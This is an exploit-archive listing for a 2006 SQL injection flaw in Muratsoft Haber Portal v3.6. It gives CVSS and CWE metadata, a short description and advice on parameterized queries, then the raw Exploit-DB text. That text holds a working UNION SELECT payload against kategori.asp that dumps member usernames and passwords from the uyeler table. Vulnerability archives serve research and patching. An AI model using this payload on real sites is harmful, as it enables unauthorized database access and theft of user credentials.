header-logo
Suggest Exploit
vendor:
Haber Portal
by:
ASIANEAGLE
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Haber Portal
Affected Version From: 3.6
Affected Version To: 3.6
Patch Exists: NO
Related CWE: N/A
CPE: a:muratsoft:haber_portal
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

Muratsoft Haber Portal v3.6 (tr) SQL Injection Vulnerability

An attacker can exploit a SQL injection vulnerability in Muratsoft Haber Portal v3.6 (tr) by sending a specially crafted HTTP request to the vulnerable application. By exploiting this vulnerability, an attacker can gain access to the database and execute arbitrary SQL commands.

Mitigation:

Developers should always use parameterized queries, also known as prepared statements, when interacting with the database. Additionally, input validation should be performed to ensure that untrusted data is not being used to construct SQL commands.
Source

Exploit-DB raw data:

#Muratsoft Haber Portal v3.6 (tr) SQL Injection Vulnerability
#Author : ASIANEAGLE
#Site   : www.asianeagle.org
#Contact: admin@asianeagle.org


#Link           : http://www.aspindir.com/Goster/4350
#Demo Portal    : http://www.muratsoft.com/haber/www/
#Price of Portal: 300YTL // Good money for Bad Script

#Exploit : 
 www.site.com /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201

#BURCU Seni hep sevdim hep sevicem.

# milw0rm.com [2006-09-03]

Navigation

Suggest Exploit

Services By CQR